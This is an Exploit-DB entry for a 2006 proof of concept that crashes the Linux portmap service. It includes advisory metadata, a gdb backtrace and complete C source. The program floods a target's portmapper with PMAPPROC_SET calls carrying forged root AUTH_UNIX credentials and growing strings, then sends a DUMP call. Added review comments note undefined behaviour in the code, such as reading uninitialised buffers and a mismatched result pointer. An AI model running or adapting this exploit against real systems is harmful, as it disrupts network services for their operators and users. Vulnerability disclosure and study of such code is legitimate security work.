by:
Federico L. Bossi Bonin
5.3
CVSS
MEDIUM
Denial of Service
CWE
Patch Exists: NO
Platforms Tested: Linux

portmap Set+Dump Local DoS – PoC

This exploit triggers a denial-of-service vulnerability in the portmap service on Linux. By sending a specially crafted request, an attacker can cause the service to crash, resulting in a denial-of-service condition. The exploit has been tested on Linux with version 5.

Mitigation:

Apply the latest patches and updates for the affected Linux version. Disable the portmap service if it is not required.

Exploit-DB raw data:

/////////////////////////////////////
// portmap Set+Dump Local DoS - PoC 
////////////////////////////////////
//
// Federico L. Bossi Bonin
// fbossi[at]netcomm[dot]com[dot]ar
////////////////////////////////////

// Tested on Linux with version 5

// USE DEBUGGING MODE
/////////////////////

// (gdb) backtrace
// #0  0xffffe410 in __kernel_vsyscall ()
// #1  0xb7f21343 in write () from /lib/tls/libc.so.6
// #2  0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6
// #3  0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6
// #4  0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6
// #5  0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6
// #6  0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6
// #7  0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6
// #8  0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6
// #9  0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6
// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6
// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6
// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6
// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6
// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515
// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6
// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6
// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6
// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303

#include <stdio.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <rpc/pmap_prot.h>

/* Number of one-byte appends (and SET calls) main() issues; argv[2] may
 * override it and main() clamps it to 1024. */
int len = 600;

/* Loop counter shared with main(). */
int i;

/* Local hostname filled by gethostname() in main() and handed to
 * authunix_create(); as a global it is zero-initialised. */
char myhost[256];

/*
 * Entry point of the PoC: opens one TCP connection to the portmapper
 * (RPC program 100000, version 2) on argv[1], issues `len` calls to
 * procedure 1 (PMAPPROC_SET in <rpc/pmap_prot.h>) with a growing string
 * argument, then one call to procedure 4 (PMAPPROC_DUMP), and exits.
 *
 * argv[1]  target hostname, resolved with gethostbyname().
 * argv[2]  optional; overrides the global `len`, clamped to 1024 below.
 *
 * Exit status is 0 on every path except the usage error (1), so a caller
 * cannot tell success from a resolver or connect failure. Every clnt_call()
 * return value is ignored; `clnt_stat` is declared but never read.
 *
 * NOTE(review): exit(), atoi(), malloc()/free(), memset()/memcpy()/strlen()
 * and close() are used without <stdlib.h>, <string.h> or <unistd.h>, so the
 * file relies on implicit declarations (removed in C99). main() itself has
 * no declared return type (implicit int).
 */
main(int argc, char *argv[]) {

if (argc < 2) {
printf("usage:%s <hostname>\n",argv[0]);
exit(1);
}

/* Optional request count. atoi() yields 0 on junk and can go negative;
 * a non-positive value means the SET loop below never runs. */
if (argc >2) { len=atoi(argv[2]);  }
/* Upper bound. NOTE(review): `data` is malloc(1024) below and each
 * iteration appends one byte at strlen(data); at len == 1024 the last
 * append leaves no room for the terminator the next strlen() depends on. */
if (len > 1024) { len=1024; }

/* Portmapper program number and version (PMAPPROG / PMAPVERS in
 * <rpc/pmap_prot.h>). */
unsigned long PROGRAM=100000;
unsigned long VERSION=2;

struct hostent *hp;
/* NOTE(review): never zeroed; only sin_addr, sin_family and sin_port are
 * assigned below, sin_zero stays indeterminate. */
struct sockaddr_in server_addr;
/* RPC_ANYSOCK: the RPC library opens the socket and writes its fd back. */
int sock = RPC_ANYSOCK;
register CLIENT *client;
enum clnt_stat clnt_stat;
/* Per-call timeout (40 s) passed by value to every clnt_call() below. */
struct timeval timeout;
timeout.tv_sec = 40;
timeout.tv_usec = 0;


/* gethostbyname() is obsolete (getaddrinfo() is the replacement);
 * resolver failure exits with status 0. */
if ((hp = gethostbyname(argv[1])) == NULL) {
printf("Can't resolve %s\n",argv[1]);
exit(0);
}

/* Local hostname for the AUTH_UNIX credential. myhost is a 256-byte
 * zero-initialised global, so a name truncated at 255 still terminates. */
gethostname(myhost,255);
/* bcopy() is legacy (memcpy()/memmove()). h_length is trusted to fit
 * sin_addr; h_addrtype is not checked against AF_INET. */
bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length);
server_addr.sin_family = AF_INET;
/* Port 0: clnttcp_create() presumably asks the remote portmapper for the
 * port itself — standard Sun RPC behaviour, verify for this libc. */
server_addr.sin_port =  0;

/* One TCP client handle with 1024-byte send/receive buffers. */
if ((client = clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) {
clnt_pcreateerror("clnttcp_create");
exit(0);
}

/* AUTH_UNIX credentials claiming uid 0 / gid 0 with no supplementary
 * groups. These are client-asserted and carry no proof; whether a server
 * honours them is purely server-side policy, which is why AUTH_UNIX is
 * not an authentication boundary worth trusting on a network service. */
client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL);

/* NOTE(review): malloc() is unchecked, and strlen() on freshly allocated
 * memory reads indeterminate bytes (undefined behaviour), so this memset()
 * clears an unpredictable length rather than the whole 1024 bytes. The
 * strlen()-based appends below assume the buffer starts out zeroed. */
char *data = (char *) malloc(1024);
memset(data,0x0,strlen(data));

/* Same unchecked malloc() / strlen()-on-uninitialised-memory pattern. */
char *response = (char *) malloc(1024);
memset(response,0x0,strlen(response));

/* Append one "1" per iteration and send PMAPPROC_SET with the string as
 * its argument. xdr_wrapstring takes a char **, so &data is right for the
 * argument. NOTE(review): `response` is a char *, not a char **, yet it is
 * passed as the result pointer; the decoder will presumably read the
 * buffer's leading bytes as a pointer — confirm before relying on any
 * reply. The return status of clnt_call() is discarded. */
for (i = 0 ; i < len ; i++) {
memcpy(data+strlen(data),"1",1);
clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *)  response,timeout);
}

/* Final PMAPPROC_DUMP call with the same (mismatched) result pointer.
 * The backtrace in the file header (reg_service -> svc_sendreply) was
 * presumably captured while the server answered one of these calls. */
clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *)  response,timeout);

/* Teardown. NOTE(review): when the library opened the socket (RPC_ANYSOCK)
 * clnt_destroy() presumably closes it as well — verify; the explicit
 * close() would then fail with EBADF, which is harmless but unchecked. */
clnt_destroy(client);
close(sock);
free(data);
free(response);
exit(0);
}

// milw0rm.com [2006-05-22]